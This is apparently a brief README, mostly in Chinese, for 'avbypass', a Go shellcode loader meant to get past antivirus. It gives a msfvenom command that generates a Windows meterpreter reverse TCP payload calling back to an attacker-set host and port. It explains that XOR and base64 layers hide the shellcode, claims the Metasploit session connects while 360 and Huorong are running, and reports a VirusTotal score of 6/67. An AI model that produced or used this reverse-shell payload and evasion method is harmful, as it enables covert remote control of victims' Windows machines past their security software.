avbypass

使用

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=xxx -f raw -o payload.bin

使用程序生成加密的shellcode后，填入指定位置，编译执行即可。

通过xor和base64多层加密shellcode实现的go加载器bypassav，

实测在开启360和火绒的情况下msf正常上线

virustotal结果 6/67，后续有时间会慢慢修改

# avbypass

avbypass

"# avbypass"